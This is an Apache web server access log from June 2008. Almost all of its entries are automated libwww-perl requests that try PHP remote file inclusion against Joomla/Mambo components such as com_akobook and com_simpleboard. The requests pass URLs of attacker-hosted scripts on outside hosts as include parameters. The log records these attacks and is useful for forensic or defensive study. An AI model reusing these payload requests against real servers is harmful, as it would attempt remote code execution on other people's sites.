205.234.215.105 - - [29/Jun/2008:18:33:56 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
204.15.135.98 - - [29/Jun/2008:18:34:23 -0600] "GET /logs/access_log//components/com_simpleboard/image_upload.php?sbp=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:34:23 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:34:23 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:34:43 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:34:43 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:34:43 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
193.202.88.113 - - [29/Jun/2008:18:34:51 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:34:51 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:34:52 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:18:35:32 -0600] "GET /transtrans.php?trans=fr&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
67.18.151.242 - - [29/Jun/2008:18:35:37 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:18:35:37 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
67.18.151.242 - - [29/Jun/2008:18:35:37 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
205.234.215.105 - - [29/Jun/2008:18:35:41 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:35:48 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
64.106.202.240 - - [29/Jun/2008:18:36:32 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:36:32 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:36:32 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 4297 "-" "libwww-perl/5.79"
67.18.241.90 - - [29/Jun/2008:18:37:00 -0600] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 298 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:37:00 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 282 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:37:01 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:37:09 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 280 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:37:09 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:37:09 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
80.82.215.11 - - [29/Jun/2008:18:37:10 -0600] "GET /logs/access_log//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:37:10 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:37:10 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.18.151.242 - - [29/Jun/2008:18:37:44 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
64.106.202.240 - - [29/Jun/2008:18:38:00 -0600] "GET /logs/access_log.20080420/errors.php?error=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:38:00 -0600] "GET /errors.php?error=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:38:01 -0600] "GET /logs/errors.php?error=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:38:35 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:38:35 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:38:35 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
217.20.163.130 - - [29/Jun/2008:18:38:53 -0600] "GET /logs/error_log.20080601//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:38:53 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:38:54 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:39:19 -0600] "GET /logs/error_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:39:25 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
202.221.143.111 - - [29/Jun/2008:18:39:29 -0600] "GET /index.php?conteudo=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
67.18.241.90 - - [29/Jun/2008:18:39:34 -0600] "GET /logs/error_log.20080601//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 306 "-" "libwww-perl/5.812"
89.188.110.30 - - [29/Jun/2008:18:39:36 -0600] "GET /logs/access_log//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:39:37 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:39:37 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.18.241.90 - - [29/Jun/2008:18:41:46 -0600] "GET /logs/error_log.20080420/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 286 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:41:46 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 262 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:41:46 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:42:26 -0600] "GET /logs/access_log.20080420/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
80.82.215.11 - - [29/Jun/2008:18:42:37 -0600] "GET /logs/error_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
216.118.97.213 - - [29/Jun/2008:18:42:47 -0600] "GET /logs/access_log.20080420/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:42:47 -0600] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:42:47 -0600] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
67.18.241.90 - - [29/Jun/2008:18:44:12 -0600] "GET /logs/access_log.20080601//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:44:12 -0600] "GET //component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 276 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:44:17 -0600] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 281 "-" "libwww-perl/5.812"
204.15.135.98 - - [29/Jun/2008:18:45:15 -0600] "GET /logs/access_log.20080420//components/com_simpleboard/image_upload.php?sbp=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
205.234.186.154 - - [29/Jun/2008:18:45:42 -0600] "GET /logs/access_log.20080420/index.php?option=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
205.234.186.154 - - [29/Jun/2008:18:45:42 -0600] "GET /index.php?option=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
205.234.186.154 - - [29/Jun/2008:18:45:42 -0600] "GET /logs/index.php?option=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
67.18.241.90 - - [29/Jun/2008:18:46:26 -0600] "GET /logs/access_log.20080615//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
89.188.110.30 - - [29/Jun/2008:18:46:52 -0600] "GET /logs/error_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:18:47:49 -0600] "GET /logs/error_log//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:18:47:52 -0600] "GET //include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:18:47:55 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
212.71.154.105 - - [29/Jun/2008:18:48:47 -0600] "GET /logs/error_log/componentscom_rsgalleryrsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:49:01 -0600] "GET /logs/access_log.20080420//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.250.234.226 - - [29/Jun/2008:18:49:11 -0600] "GET /logs/error_log.20080420/errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
217.20.163.130 - - [29/Jun/2008:18:49:11 -0600] "GET /logs/access_log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.65"
209.250.234.226 - - [29/Jun/2008:18:49:22 -0600] "GET /logs/error_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:49:28 -0600] "GET /logs/error_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
84.2.17.228 - - [29/Jun/2008:18:50:19 -0600] "GET /logs/error_log.20080511//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
84.2.17.228 - - [29/Jun/2008:18:50:20 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
84.2.17.228 - - [29/Jun/2008:18:50:21 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
193.202.88.113 - - [29/Jun/2008:18:51:17 -0600] "GET /logs/access_log//errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:51:17 -0600] "GET //errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:51:17 -0600] "GET /logs//errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
58.147.79.83 - - [29/Jun/2008:18:51:32 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://easynets.org/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
193.202.88.113 - - [29/Jun/2008:18:51:39 -0600] "GET /logs/access_log//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:51:39 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:51:40 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
189.19.255.240 - - [29/Jun/2008:18:51:40 -0600] "GET /logs/error_log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:18:51:40 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:18:51:45 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
84.2.17.228 - - [29/Jun/2008:18:52:37 -0600] "GET /logs/access_log.20080511//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
189.56.104.251 - - [29/Jun/2008:18:53:15 -0600] "GET /index.php?body=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.53.196.178 - - [29/Jun/2008:18:53:23 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
64.106.202.240 - - [29/Jun/2008:18:53:52 -0600] "GET /logs/error_log.20080420/errors.php?error=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:53:53 -0600] "GET /logs/error_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
67.18.241.90 - - [29/Jun/2008:18:54:01 -0600] "GET /logs/error_log.20080420//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:54:01 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:54:01 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
89.188.110.30 - - [29/Jun/2008:18:54:05 -0600] "GET /logs/access_log.20080420//components/com_simpleboard/image_upload.php?sbp=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.241.90 - - [29/Jun/2008:18:54:09 -0600] "GET /logs/error_log.20080420/modules/My_eGallery/index.php?basepath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 259 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:54:10 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:54:10 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 240 "-" "libwww-perl/5.812"
64.1.215.164 - - [29/Jun/2008:18:54:33 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
67.18.241.90 - - [29/Jun/2008:18:55:24 -0600] "GET /logs/access_log.20080420/modules/My_eGallery/index.php?basepath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:55:24 -0600] "GET /logs/access_log.20080420//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:55:43 -0600] "GET /logs/access_log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 257 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:55:43 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 241 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:55:43 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
217.20.163.130 - - [29/Jun/2008:18:57:09 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:57:10 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
67.18.241.90 - - [29/Jun/2008:18:58:15 -0600] "GET /logs/access_log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 268 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:58:15 -0600] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:58:16 -0600] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 257 "-" "libwww-perl/5.812"
8.2.208.2 - - [29/Jun/2008:18:58:29 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
69.72.211.242 - - [29/Jun/2008:18:58:30 -0600] "GET /logs/access_log.20080601/transtrans.php?trans=fr&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:18:58:30 -0600] "GET /logs/transtrans.php?trans=fr&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
64.150.164.61 - - [29/Jun/2008:18:58:31 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
64.150.164.61 - - [29/Jun/2008:18:58:31 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
64.150.164.61 - - [29/Jun/2008:18:58:31 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
64.150.164.61 - - [29/Jun/2008:18:58:32 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
64.150.164.61 - - [29/Jun/2008:18:58:32 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
